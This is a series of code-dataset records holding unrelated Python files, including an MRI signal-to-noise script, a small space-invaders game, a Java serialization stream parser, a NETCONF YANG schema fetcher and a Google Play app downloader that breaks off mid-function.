saveAsPreviousState(exported_files)\n checkDiskSpace()\n","sub_path":"test-bugzilla-files/new-control.py","file_name":"new-control.py","file_ext":"py","file_size_in_byte":6401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"308692771","text":"#!/usr/bin/env python\n#########################################################################################\n#\n# Compute SNR in a given ROI according to different methods presented in Dietrich et al.,\n# Measurement of signal-to-noise ratios in MR images: Influence of multichannel coils,\n# parallel imaging, and reconstruction filters (2007).\n#\n# ---------------------------------------------------------------------------------------\n# Copyright (c) 2015 Polytechnique Montreal \n# Authors: Simon LEVY\n#\n# About the license: see the file LICENSE.TXT\n#########################################################################################\n\nimport sys\nimport numpy as np\nfrom msct_parser import Parser\nfrom msct_image import Image\nfrom sct_image import get_orientation_3d, set_orientation\nimport sct_utils as sct\nfrom os import rmdir, chdir\n\n\n# PARSER\n# ==========================================================================================\ndef get_parser():\n\n # Initialize the parser\n parser = Parser(__file__)\n parser.usage.set_description('Compute SNR in a given ROI according to different methods presented in Dietrich et al., Measurement of signal-to-noise ratios in MR images: Influence of multichannel coils, parallel imaging, and reconstruction filters (2007).')\n parser.add_option(name=\"-i\",\n type_value='image_nifti',\n description=\"Input images to compute the SNR on. Must be concatenated in time. Typically, 2 or 3 b0s concatenated in time (depending on the method used).\",\n mandatory=True,\n example=\"b0s.nii.gz\")\n parser.add_option(name=\"-m\",\n type_value='image_nifti',\n description='ROI within which SNR will be averaged.',\n mandatory=True,\n example='dwi_moco_mean_seg.nii.gz')\n parser.add_option(name=\"-method\",\n type_value='multiple_choice',\n description='Method to use to compute the SNR:\\n- diff: Use the two first volumes to estimate noise variance.\\n- mult: Use all volumes to estimate noise variance.',\n mandatory=False,\n default_value='diff',\n example=['diff', 'mult', 'background', 'nema'])\n parser.add_option(name=\"-vertfile\",\n type_value='image_nifti',\n description='File name of the vertebral labeling registered to the input images.',\n mandatory=False,\n default_value='label/template/MNI-Poly-AMU_level.nii.gz')\n parser.add_option(name=\"-vert\",\n type_value='str',\n description='Vertebral levels where to compute the SNR.',\n mandatory=False,\n example='2:6',\n default_value='None')\n parser.add_option(name=\"-z\",\n type_value='str',\n description='Slices where to compute the SNR.',\n mandatory=False,\n example='2:6',\n default_value='None')\n parser.add_option(name=\"-v\",\n type_value=\"multiple_choice\",\n description=\"\"\"Verbose. 0: nothing. 1: basic.\"\"\",\n mandatory=False,\n default_value='0',\n example=['0', '1'])\n return parser\n\n\n# MAIN\n# ==========================================================================================\ndef main():\n\n # initialization\n fname_mask = ''\n\n # Get parser info\n parser = get_parser()\n arguments = parser.parse(sys.argv[1:])\n fname_data = arguments['-i']\n fname_mask = arguments['-m']\n vert_label_fname = arguments[\"-vertfile\"]\n vert_levels = arguments[\"-vert\"]\n slices_of_interest = arguments[\"-z\"]\n method = arguments[\"-method\"]\n verbose = int(arguments['-v'])\n\n\n # Check if data are in RPI\n input_im = Image(fname_data)\n input_orient = get_orientation_3d(input_im)\n\n # If orientation is not RPI, change to RPI\n if input_orient != 'RPI':\n sct.printv('\\nCreate temporary folder to change the orientation of the NIFTI files into RPI...', verbose)\n path_tmp = sct.tmp_create()\n # change orientation and load data\n sct.printv('\\nChange input image orientation and load it...', verbose)\n input_im_rpi = set_orientation(input_im, 'RPI', fname_out=path_tmp+'input_RPI.nii')\n input_data = input_im_rpi.data\n # Do the same for the mask\n sct.printv('\\nChange mask orientation and load it...', verbose)\n mask_im_rpi = set_orientation(Image(fname_mask), 'RPI', fname_out=path_tmp+'mask_RPI.nii')\n mask_data = mask_im_rpi.data\n # Do the same for vertebral labeling if present\n if vert_levels != 'None':\n sct.printv('\\nChange vertebral labeling file orientation and load it...', verbose)\n vert_label_im_rpi = set_orientation(Image(vert_label_fname), 'RPI', fname_out=path_tmp+'vert_labeling_RPI.nii')\n vert_labeling_data = vert_label_im_rpi.data\n # Remove the temporary folder used to change the NIFTI files orientation into RPI\n sct.printv('\\nRemove the temporary folder...', verbose)\n rmdir(path_tmp)\n else:\n # Load data\n sct.printv('\\nLoad data...', verbose)\n input_data = input_im.data\n mask_data = Image(fname_mask).data\n if vert_levels != 'None':\n vert_labeling_data = Image(vert_label_fname).data\n sct.printv('\\tDone.', verbose)\n\n # Get slices corresponding to vertebral levels\n if vert_levels != 'None':\n from sct_extract_metric import get_slices_matching_with_vertebral_levels\n slices_of_interest, actual_vert_levels, warning_vert_levels = get_slices_matching_with_vertebral_levels(mask_data, vert_levels, vert_labeling_data, verbose)\n\n # Remove slices that were not selected\n if slices_of_interest == 'None':\n slices_of_interest = '0:'+str(mask_data.shape[2]-1)\n slices_boundary = slices_of_interest.split(':')\n slices_of_interest_list = range(int(slices_boundary[0]), int(slices_boundary[1])+1)\n # Crop\n input_data = input_data[:, :, slices_of_interest_list, :]\n mask_data = mask_data[:, :, slices_of_interest_list]\n\n # Get signal and noise\n indexes_roi = np.where(mask_data == 1)\n if method == 'mult':\n signal = np.mean(input_data[indexes_roi])\n std_input_temporal = np.std(input_data, 3)\n noise = np.mean(std_input_temporal[indexes_roi])\n elif method == 'diff':\n data_1 = input_data[:, :, :, 0]\n data_2 = input_data[:, :, :, 1]\n signal = np.mean(np.add(b0_1[indexes_roi], b0_2[indexes_roi]))\n noise = np.sqrt(2)*np.std(np.subtract(b0_1[indexes_roi], b0_2[indexes_roi]))\n elif method == 'background':\n sct.printv('ERROR: Sorry, method is not implemented yet.', 1, 'error')\n elif method == 'nema':\n sct.printv('ERROR: Sorry, method is not implemented yet.', 1, 'error')\n\n # compute SNR\n SNR = signal/noise\n\n # Display result\n sct.printv('\\nSNR_'+method+' = '+str(SNR)+'\\n', type='info')\n\n\n\n# START PROGRAM\n# ==========================================================================================\nif __name__ == \"__main__\":\n # call main function\n main()\n","sub_path":"scripts/sct_compute_snr.py","file_name":"sct_compute_snr.py","file_ext":"py","file_size_in_byte":7432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"464271549","text":"class Gracz(object):\r\n \r\n def __init__(self):\r\n \r\n # x i y - pozycja\r\n self.zycie = 3\r\n self.x = 335\r\n self.y = 450\r\n self.left = 0\r\n self.right = 0\r\n self.speed = 15\r\n \r\n \r\n def show(self): # pokaż gracza\r\n fill(241, 196, 15)\r\n circle(self.x, self.y, 55)\r\n \r\n def update(self): # aktualizuje pozycję gracza + ogranicznik przy krawędziach\r\n self.x = self.x + (self.right - self.left) *self.speed\r\n \r\n if not (self.x <= (700 - 35)):\r\n self.x = (700 - 35) \r\n \r\n if not (self.x >= 35):\r\n self.x = 35\r\n \r\n \r\n #def strac_zycie(self,zycie):\r\n #self.zycie -= 1\r\n \r\n #if self.zycie == 0:\r\n #print(\"Game over!\")\r\n \r\n \r\nclass Bullet(object):\r\n \r\n def __init__(self):\r\n self.pl_x = 335\r\n self.y = 450\r\n self.speed = 20\r\n self.up = 0\r\n self.right = 0\r\n self.left = 0\r\n self.player_speed = 15\r\n \r\n \r\n def show_bullet(self):\r\n fill(255)\r\n rect(self.pl_x-2, self.y-27, 3, 12)\r\n \r\n def update_bullet(self):\r\n self.pl_x = self.pl_x + (self.right - self.left) * self.player_speed\r\n \r\n \r\n def shot(self):\r\n self.y = self.y - self.up * self.speed\r\n \r\n \r\n \r\n \r\n\r\ndef setup():\r\n size(700, 500)\r\n \r\n global statek\r\n statek = Gracz()\r\n \r\n \r\ndef draw():\r\n background(74, 35, 90)\r\n global statek\r\n global pocisk\r\n statek.show()\r\n statek.update()\r\n \r\n pocisk.update_bullet()\r\n \r\n print(mouseX, mouseY)\r\n \r\ndef keyPressed():\r\n if keyCode == LEFT:\r\n statek.left = 1\r\n pocisk.left = 1\r\n\r\n \r\n if keyCode == RIGHT:\r\n statek.right = 1\r\n pocisk.right = 1\r\n\r\n \r\n if keyCode == 32:\r\n pocisk = Bullet()\r\n pocisk.up = 1\r\n pocisk.show_bullet()\r\n pocisk.shot()\r\n \r\ndef keyReleased():\r\n if keyCode == LEFT:\r\n statek.left = 0\r\n pocisk.left = 0\r\n \r\n if keyCode == RIGHT:\r\n statek.right = 0\r\n pocisk.right = 0\r\n \r\n if keyCode == 32:\r\n pocisk.up = 0\r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n","sub_path":"space_invaders.pyde","file_name":"space_invaders.pyde","file_ext":"pyde","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"301508558","text":"from struct import pack, unpack\n\nfrom Constants import Constants\nfrom Exceptions import InvalidHeaderException, InvalidTypeCodeException\nfrom JavaMetaClass import *\n\n\nclass ObjectIO:\n def __init__(self, base_stream):\n self.base_stream = base_stream\n\n def readByte(self) -> bytes:\n return self.base_stream.read(1)\n\n def peekByte(self) -> bytes:\n return self.base_stream.peek()[:1]\n\n def readUnsignedShort(self) -> int:\n number = self.readBytes(2)\n number = int.from_bytes(number, 'big')\n return number & 0xFFFF\n\n def readUnsignedLong(self) -> int:\n number = self.readBytes(8)\n return int.from_bytes(number, 'big') & 0xFFFFFFFFFFFFFFFF\n\n def readLong(self) -> int:\n number = self.readBytes(8)\n return int.from_bytes(number, 'big')\n\n def readShort(self) -> int:\n number = self.readBytes(2)\n return int.from_bytes(number, 'big')\n\n def readInt(self) -> int:\n return int.from_bytes(self.readBytes(4), 'big')\n\n def writeInt(self, num):\n self.writeBytes(num.to_bytes(4, 'big'))\n\n def readBytes(self, length) -> bytes:\n return self.base_stream.read(length)\n\n def readString(self) -> str:\n length = self.readUnsignedShort()\n return self.readBytes(length).decode()\n\n def readFloat(self):\n num = self.readBytes(4)\n return unpack('f', num)[0]\n\n def readBoolean(self):\n tc = int.from_bytes(self.readByte(), 'big')\n return True if tc == 0 else False\n\n def readChar(self):\n tc = self.readBytes(2)\n return tc.decode()\n\n def readDouble(self):\n tc = self.readBytes(8)\n return unpack('d', tc)[0]\n\n def writeBytes(self, value):\n self.base_stream.write(value)\n\n def writeString(self, value):\n length = len(value)\n self.writeShort(length)\n self.writeBytes(value.encode())\n\n def pack(self, fmt, data):\n return self.writeBytes(pack(fmt, data))\n\n def unpack(self, fmt, length=1):\n return unpack(fmt, self.readBytes(length))[0]\n\n def writeShort(self, num):\n self.writeBytes(num.to_bytes(2, \"big\"))\n\n def writeLong(self, num):\n self.writeBytes(num.to_bytes(8, \"big\"))\n\n def writeFloat(self, value):\n self.writeBytes(pack('f', value))\n\n def writeChar(self, value):\n self.writeBytes(value.encode)\n\n def writeDouble(self, value):\n self.writeBytes(pack('d', value))\n\n def writeBoolean(self, value):\n value = 0 if value else 1\n self.writeBytes(value.to_bytes(1, 'big'))\n\n\nclass ObjectStream:\n def __init__(self, stream):\n self.bin = ObjectIO(stream)\n self.handles = []\n self.readStreamHeader()\n\n def newHandles(self, __object__):\n self.handles.append(__object__)\n return len(self.handles) - 1 + Constants.baseWireHandle\n\n def readStreamHeader(self):\n magic = self.bin.readUnsignedShort()\n version = self.bin.readUnsignedShort()\n if magic != Constants.magic or version != Constants.version:\n raise InvalidHeaderException(magic, version)\n\n def readClassDescriptor(self):\n \"\"\"\n 读取非动态代理类的结构, 已经将读取到的classdesc添加到handle中\n :return:\n \"\"\"\n tc = self.bin.peekByte()\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.__readClassDesc__()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n else:\n raise InvalidTypeCodeException(tc)\n return javaClass\n\n def readProxyClassDescriptor(self):\n \"\"\"\n 读取动态代理类的结构\n # TODO: 此处可能有问题,需要进一步检查\n :return:\n \"\"\"\n tc = self.bin.readByte()\n if tc != Constants.TC_PROXYCLASSDESC:\n raise InvalidTypeCodeException(tc)\n interfaceCount = self.bin.readInt()\n print(f\"Interface count {interfaceCount}\")\n interfaces = []\n for i in range(interfaceCount):\n interfaceName = self.bin.readString()\n interfaces.append(interfaceName)\n print(\"--------------\")\n print(interfaceName)\n javaProxyClass = JavaProxyClass(interfaces)\n handle = self.newHandles(javaProxyClass)\n print(f\"TC_PROXYCLASSDESC new handle from {hex(handle)}\")\n self.readClassAnnotations(javaProxyClass)\n javaProxyClass.superJavaClass = self.readSuperClassDesc()\n return javaProxyClass\n\n def __readClassDesc__(self):\n tc = self.bin.readByte()\n if tc != Constants.TC_CLASSDESC:\n raise InvalidTypeCodeException(tc)\n # read Class name from bin\n className = self.bin.readString()\n suid = self.bin.readUnsignedLong()\n flags = self.bin.readByte()\n flags = int.from_bytes(flags, 'big')\n numFields = self.bin.readUnsignedShort()\n externalizable = flags & Constants.SC_EXTERNALIZABLE != 0\n sflag = flags & Constants.SC_SERIALIZABLE != 0\n hasWriteObjectData = flags & Constants.SC_WRITE_METHOD != 0\n hasBlockExternalData = flags & Constants.SC_BLOCK_DATA != 0\n if externalizable and sflag:\n print(\"serializable and externalizable flags conflict\")\n\n print(f\"className {className}\")\n print(f\"suid {suid}\")\n print(f\"number of fields {numFields}\")\n classDesc = JavaClass(className, suid, flags)\n classDesc.hasWriteObjectData = hasWriteObjectData\n classDesc.hasBlockExternalData = hasBlockExternalData\n handle = self.newHandles(classDesc)\n print(f\"TC_CLASSDESC new handle from {hex(handle)} className {className}\")\n fields = []\n for i in range(numFields):\n tcode = self.bin.readByte()\n fname = self.bin.readString()\n if tcode == b'L' or tcode == b'[':\n signature = self.readTypeString()\n else:\n signature = tcode.decode()\n fields.append({'name': fname, 'signature': signature})\n print(f\"name {fname} signature {signature}\")\n classDesc.fields = fields\n self.readClassAnnotations(classDesc)\n superjavaClass = self.readSuperClassDesc()\n classDesc.superJavaClass = superjavaClass\n return classDesc\n\n def readClassAnnotations(self, classDesc):\n \"\"\"\n 读取类的附加信息\n \"\"\"\n print(f\"ClassAnnotations start \")\n while True:\n __obj__ = self.readContent()\n classDesc.classAnnotations.append(__obj__)\n if isinstance(__obj__, JavaEndBlock):\n break\n\n print(f\"ClassAnnotations end \")\n\n def readSuperClassDesc(self):\n \"\"\"\n 读取父类的的class信息,一直到父类为空,类似于链表。java不支持多继承\n :return:\n \"\"\"\n tc = self.bin.peekByte()\n print(f\"Super Class start\")\n if tc != Constants.TC_NULL:\n superJavaClass = self.readClassDescriptor()\n else:\n self.bin.readByte()\n superJavaClass = None\n print(f\"Super Class End\")\n return superJavaClass\n\n def readObject(self):\n tc = self.bin.readByte()\n if tc != Constants.TC_OBJECT:\n raise InvalidTypeCodeException(tc)\n tc = self.bin.peekByte()\n javaClass = None\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.readClassDescriptor()\n elif tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n elif tc == Constants.TC_PROXYCLASSDESC:\n javaClass = self.readProxyClassDescriptor()\n else:\n raise InvalidTypeCodeException(tc)\n\n javaObject = JavaObject(javaClass)\n handle = self.newHandles(javaObject)\n print(f\"readObject new handle from {hex(handle)}\")\n self.readClassData(javaObject)\n return javaObject\n\n def readClassData(self, javaObject):\n \"\"\"\n 读取对象的值,先读取父类的值,再读取子类的值\n :return:\n \"\"\"\n superClass = javaObject.javaClass\n superClassList = []\n while superClass:\n superClassList.append(superClass)\n superClass = superClass.superJavaClass\n\n while superClassList:\n classDesc = superClassList.pop()\n fields = classDesc.fields\n currentField = []\n for field in fields:\n singature = field['signature']\n value = self.readFieldValue(singature)\n javaField = JavaField(field['name'], singature, value)\n currentField.append(javaField)\n javaObject.fields.append(currentField)\n if classDesc.hasWriteObjectData:\n self.readObjectAnnotations(javaObject)\n\n def readHandle(self):\n \"\"\"\n 反序列化中是不会出现两个一摸一样的值,第二个值一般都是引用\n :return:\n \"\"\"\n self.bin.readByte()\n handle = self.bin.readInt()\n print(hex(handle))\n handle = handle - Constants.baseWireHandle\n return self.handles[handle]\n\n def readTypeString(self):\n tc = self.bin.peekByte()\n if tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n return self.readHandle()\n elif tc == Constants.TC_STRING:\n return self.readString()\n elif tc == Constants.TC_LONGSTRING:\n return self.readString()\n else:\n raise InvalidTypeCodeException(tc)\n\n def readString(self):\n self.bin.readByte()\n string = self.bin.readString()\n javaString = JavaString(string)\n handle = self.newHandles(javaString)\n print(f\"readString new handle from {hex(handle)} value {string}\")\n return javaString\n\n def readContent(self):\n tc = self.bin.peekByte()\n if tc == Constants.TC_NULL:\n return self.readNull()\n elif tc == Constants.TC_REFERENCE:\n return self.readHandle()\n elif tc == Constants.TC_CLASS:\n self.bin.readByte()\n clazz = self.readClassDescriptor()\n handle = self.newHandles(clazz)\n print(f\"TC_CLASS new handle from {hex(handle)}\")\n return clazz\n elif tc == Constants.TC_CLASSDESC:\n return self.readClassDescriptor()\n elif tc == Constants.TC_PROXYCLASSDESC:\n return self.readProxyClassDescriptor()\n elif tc == Constants.TC_STRING or tc == Constants.TC_LONGSTRING:\n return self.readTypeString()\n elif tc == Constants.TC_ENUM:\n return self.readEnum()\n elif tc == Constants.TC_OBJECT:\n return self.readObject()\n elif tc == Constants.TC_EXCEPTION:\n return self.readException()\n elif tc == Constants.TC_RESET:\n self.readReset()\n elif tc == Constants.TC_ARRAY:\n return self.readArray()\n elif tc == Constants.TC_BLOCKDATA:\n return self.readBlockData()\n elif tc == Constants.TC_BLOCKDATALONG:\n return self.readLongBLockData()\n elif tc == Constants.TC_ENDBLOCKDATA:\n return self.readEndBlock()\n else:\n raise InvalidTypeCodeException(tc)\n\n def readBlockData(self):\n self.bin.readByte()\n length = int.from_bytes(self.bin.readByte(), 'big')\n data = self.bin.readBytes(length)\n print(data)\n blockData = JavaBLockData(length, data)\n return blockData\n\n def readEndBlock(self):\n self.bin.readByte()\n endBD = JavaEndBlock()\n return endBD\n\n def readObjectAnnotations(self, javaObject):\n print(\"reading readObjectAnnotations\")\n while True:\n __obj__ = self.readContent()\n javaObject.objectAnnotation.append(__obj__)\n if isinstance(__obj__, JavaEndBlock):\n break\n\n def readNull(self):\n self.bin.readByte()\n return 'null'\n\n def readArray(self):\n self.bin.readByte()\n tc = self.bin.peekByte()\n javaClass = None\n if tc == Constants.TC_CLASSDESC:\n javaClass = self.readClassDescriptor()\n elif tc == Constants.TC_REFERENCE:\n javaClass = self.readHandle()\n else:\n print(\"unsupport type\")\n size = self.bin.readInt()\n print(javaClass)\n print(f\"array size {size}\")\n javaarray = JavaArray(size, javaClass)\n handle = self.newHandles(javaarray)\n print(f\"TC_ARRAY new handle from {hex(handle)}\")\n for i in range(size):\n signature = javaClass.name[1:]\n javaarray.add(self.readFieldValue(signature))\n return javaarray\n\n def readFieldValue(self, singature: str):\n \"\"\"\n 读取字段的值,根据字段的类型\n \"\"\"\n if singature.startswith(\"L\") or singature.startswith(\"[\"):\n return self.readContent()\n elif singature == 'B':\n return self.bin.readByte()\n elif singature == 'C':\n return self.bin.readChar()\n elif singature == 'D':\n return self.bin.readDouble()\n elif singature == 'F':\n return self.bin.readFloat()\n elif singature == 'I':\n return self.bin.readInt()\n elif singature == 'J':\n return self.bin.readLong()\n elif singature == 'S':\n return self.bin.readShort()\n elif singature == \"Z\":\n return self.bin.readBoolean()\n else:\n print(f\"unsupport singature {singature}\")\n\n def readEnum(self):\n self.bin.readByte()\n javaClass = self.readClassDescriptor()\n javaEnum = JavaEnum(javaClass)\n handle = self.newHandles(javaEnum)\n print(f\"read enum new handle {handle}\")\n enumConstantName = self.readContent()\n javaEnum.enumConstantName = enumConstantName\n return javaEnum\n\n def readReset(self):\n self.bin.readByte()\n self.handles = []\n\n def readException(self):\n self.bin.readByte()\n self.handles = []\n exception = self.readObject()\n self.handles = []\n javaException = JavaException(exception)\n return javaException\n\n def readLongBLockData(self):\n self.bin.readByte()\n length = int.from_bytes(self.bin.readBytes(4), 'big')\n data = self.bin.readBytes(length)\n print(data)\n blockData = JavaLongBLockData(length, data)\n return blockData\n","sub_path":"serializationDump.py","file_name":"serializationDump.py","file_ext":"py","file_size_in_byte":14692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"338369054","text":"from .sitetree import SiteTree\n\nclass SiteTreeAPI(object):\n\n def __init__(self, mongo_uri):\n\n self.tree = SiteTree(domain='', chroot='/', mongo_uri=mongo_uri)\n\n def urls(self, domain, chroot='/'):\n\n self.tree.domain = domain\n self.tree.chroot = chroot\n if self.tree.sync():\n for url in self.tree.walk():\n yield url\n\n","sub_path":"sitetree/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"231704982","text":"#!/usr/bin/env python\n\n\"\"\"\n Netconf python example by yang-explorer (https://github.com/CiscoDevNet/yang-explorer)\n\n Installing python dependencies:\n > pip install lxml ncclient\n\n Running script: (save as example.py)\n > python example.py -a 192.168.0.122 -u netconf -p cisco --port 830\n#Testing github. THis should appear in the fix a bug branch!\n\"\"\"\n\nimport lxml.etree as ET\nfrom argparse import ArgumentParser\nfrom ncclient import manager\nfrom ncclient.operations import RPCError\n\npayload = \"\"\"\n \n snmpevents \n \n\"\"\"\n\npayload_int=\"\"\"\n\n \n \n \n \n \n \n \n GigabitEthernet2 \n ianaift:ethernetCsmacd \n true \n \n \n \n \n \n\"\"\"\n\ninterfaces_payload=\"\"\"\n\n \n \n \n \n \n \n \n\"\"\"\n\n\nif __name__ == '__main__':\n\n parser = ArgumentParser(description='Usage:')\n\n # script arguments\n parser.add_argument('-a', '--host', type=str, required=False, default='192.168.0.122',\n help=\"Device IP address or Hostname\")\n parser.add_argument('-u', '--username', type=str, required=False, default='netconf',\n help=\"Device Username (netconf agent username)\")\n parser.add_argument('-p', '--password', type=str, required=False, default='cisco',\n help=\"Device Password (netconf agent password)\")\n parser.add_argument('--port', type=int, default=830,\n help=\"Netconf agent port\")\n args = parser.parse_args()\n\n # connect to netconf agent\n with manager.connect(host=args.host,\n port=args.port,\n username=args.username,\n password=args.password,\n timeout=90,\n hostkey_verify=False,\n device_params={'name': 'csr'}) as m:\n\n # execute netconf operation\n #response = m.dispatch(ET.fromstring(payload_int)).xml\n #response = m.get_config('running').xml\n #data = ET.fromstring(response)\n\n yang_schemas=['ietf-ip','ietf-interfaces','ietf-yang-types','ietf-inet-types']\n\n\n for zz in yang_schemas:\n schema = m.get_schema(zz)\n root = ET.fromstring((schema.xml).encode('ascii')) #.encode ascii is required otherwise we get an error\n #print(schema.xml) # Test Code Only\n #Now we need to extract the yang and write it to a file.\n yang_text = list(root)[0].text\n with open(zz + \".yang\",\"w+\") as f:\n f.write(yang_text)\n","sub_path":"netconf-int.py","file_name":"netconf-int.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"568750015","text":"from gpapi.googleplay import GooglePlayAPI, LoginError, RequestError\nfrom pyaxmlparser import APK\nfrom subprocess import Popen, PIPE\n\nimport base64\nimport os\nimport sys\nimport concurrent.futures\nfrom datetime import datetime as dt\nfrom shutil import move\n\nNOT_LOGGED_IN_ERR = 'Not logged in'\nWRONG_CREDENTIALS_ERR = 'Wrong credentials'\nSESSION_EXPIRED_ERR = 'Session tokens expired, re-login needed'\nFDROID_ERR = 'Error while executing fdroidserver tool'\n\n\ndef makeError(message):\n return {'status': 'ERROR',\n 'message': message}\n\n\ndef get_details_from_apk(apk, downloadPath, service):\n if apk is not None:\n filepath = os.path.join(downloadPath, apk)\n try:\n a = APK(filepath)\n except Exception as e:\n print(e)\n return None\n print('Fetching details for %s' % a.package)\n try:\n details = service.details(a.package)\n details['filename'] = apk\n except RequestError as e:\n print('Cannot fetch information for %s' % a.package)\n print('Extracting basic information from package...')\n return {'docId': a.package,\n 'filename': apk,\n 'versionCode': int(a.version_code),\n 'title': a.application}\n print('Added %s to cache' % details['docId'])\n return details\n\n\nclass Play(object):\n def __init__(self, debug=True, fdroid=False):\n self.currentSet = []\n self.totalNumOfApps = 0\n self.debug = debug\n self.fdroid = fdroid\n self.firstRun = True\n self.loggedIn = False\n self._email = None\n self._passwd = None\n self._last_fdroid_update = None\n\n # configuring download folder\n if self.fdroid:\n self.download_path = os.path.join(os.getcwd(), 'repo')\n else:\n self.download_path = os.getcwd()\n\n # configuring fdroid data\n if self.fdroid:\n self.fdroid_exe = 'fdroid'\n self.fdroid_path = os.getcwd()\n self.fdroid_init()\n\n self.service = GooglePlayAPI(self.debug)\n\n def fdroid_init(self):\n found = False\n for path in os.environ['PATH'].split(':'):\n exe = os.path.join(path, self.fdroid_exe)\n if os.path.isfile(exe):\n found = True\n break\n if not found:\n print('Please install fdroid')\n sys.exit(1)\n elif os.path.isfile('./config.py'):\n print('Repo already initalized, skipping')\n else:\n p = Popen([self.fdroid_exe, 'init', '-v'], stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error initializing fdroid repository \" +\n stderr.decode('utf-8'))\n sys.exit(1)\n # backup config.py\n if self.debug:\n print('Backing up config.py')\n move('./config.py', './config-backup.py')\n with open('./config-backup.py') as f1:\n content = f1.readlines()\n # copy all content of backup in the main config.py\n # if the file was not modified with custom values, do it\n with open('./config.py', 'w') as f:\n modified = False\n for line in content:\n if '# playmaker' in line:\n modified = True\n f.write(line)\n if not modified:\n if self.debug:\n print('Appending playmaker data to config.py')\n f.write('\\n# playmaker\\nrepo_name = \"playmaker\"\\n'\n 'repo_description = \"repository managed with '\n 'playmaker https://github.com/NoMore201/playmaker\"\\n')\n os.chmod('./config.py', 0o600)\n\n # ensure all folder and files are setup\n p = Popen([self.fdroid_exe, 'update', '--create-key', '-v'], stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error initializing fdroid repository \" +\n stderr.decode('utf-8'))\n else:\n print('Fdroid repo initialized successfully')\n\n def get_last_fdroid_update(self):\n return {'status': 'SUCCESS',\n 'message': str(self._last_fdroid_update)}\n\n def fdroid_update(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if self.fdroid:\n try:\n p = Popen([self.fdroid_exe, 'update', '-c', '--clean'],\n stdout=PIPE, stderr=PIPE)\n stdout, stderr = p.communicate()\n if p.returncode != 0:\n sys.stderr.write(\"error updating fdroid repository \" +\n stderr.decode('utf-8'))\n return makeError(FDROID_ERR)\n else:\n print('Fdroid repo updated successfully')\n self._last_fdroid_update = dt.today().replace(microsecond=0)\n return {'status': 'SUCCESS'}\n except Exception as e:\n return makeError(FDROID_ERR)\n else:\n return {'status': 'SUCCESS'}\n\n def get_apps(self):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n if self.firstRun:\n return {'status': 'PENDING',\n 'total': self.totalNumOfApps,\n 'current': len(self.currentSet)}\n return {'status': 'SUCCESS',\n 'message': sorted(self.currentSet, key=lambda k: k['title'])}\n\n def login(self, email=None, password=None):\n def unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n try:\n if email is not None and password is not None:\n self._email = base64.b64decode(email).decode('utf-8')\n self._passwd = base64.b64decode(password).decode('utf-8')\n self.service.login(self._email,\n self._passwd,\n None, None)\n else:\n # otherwise we need only to refresh auth token\n encrypted = self.service.encrypt_password(self._email,\n self._passwd).decode('utf-8')\n self.service.getAuthSubToken(self._email,\n encrypted)\n self.loggedIn = True\n return {'status': 'SUCCESS', 'message': 'OK'}\n except LoginError as e:\n print('Wrong credentials: {0}'.format(e))\n return {'status': 'ERROR',\n 'message': 'Wrong credentials'}\n except RequestError as e:\n # probably tokens are invalid, so it is better to\n # invalidate them\n print(e)\n return {'status': 'ERROR',\n 'message': 'Request error, probably invalid token'}\n\n def update_state(self):\n print('Updating cache')\n with concurrent.futures.ProcessPoolExecutor() as executor:\n # get application ids from apk files\n apkFiles = [apk for apk in os.listdir(self.download_path)\n if os.path.splitext(apk)[1] == '.apk']\n self.totalNumOfApps = len(apkFiles)\n if self.totalNumOfApps != 0:\n future_to_app = [executor.submit(get_details_from_apk,\n a,\n self.download_path,\n self.service)\n for a in apkFiles]\n for future in concurrent.futures.as_completed(future_to_app):\n app = future.result()\n if app is not None:\n self.currentSet.append(app)\n print('Cache correctly initialized')\n self.firstRun = False\n\n def insert_app_into_state(self, newApp):\n found = False\n result = list(filter(lambda x: x['docId'] == newApp['docId'],\n self.currentSet))\n if len(result) > 0:\n found = True\n if self.debug:\n print('%s is already cached, updating..' % newApp['docId'])\n i = self.currentSet.index(result[0])\n self.currentSet[i] = newApp\n if not found:\n if self.debug:\n print('Adding %s into cache..' % newApp['docId'])\n self.currentSet.append(newApp)\n\n def search(self, appName, numItems=15):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n try:\n apps = self.service.search(appName, numItems, None)\n except RequestError as e:\n print(e)\n self.loggedIn = False\n return {'status': 'ERROR',\n 'message': SESSION_EXPIRED_ERR}\n except LoginError as e:\n print(SESSION_EXPIRED_ERR)\n self.loggedIn = False\n except IndexError as e:\n print(SESSION_EXPIRED_ERR)\n self.loggedIn = False\n\n return {'status': 'SUCCESS',\n 'message': apps}\n\n def details(self, app):\n try:\n details = self.service.details(app)\n except RequestError:\n details = None\n return details\n\n def get_bulk_details(self, apksList):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n try:\n apps = [self.details(a) for a in apksList]\n except LoginError as e:\n print(e)\n self.loggedIn = False\n return apps\n\n def download_selection(self, appNames):\n if not self.loggedIn:\n return {'status': 'UNAUTHORIZED'}\n success = []\n failed = []\n unavail = []\n\n for app in appNames:\n details = self.details(app)\n if details is None:\n print('Package %s does not exits' % app)\n unavail.append(app)\n continue\n print('Downloading %s' % app)\n try:\n 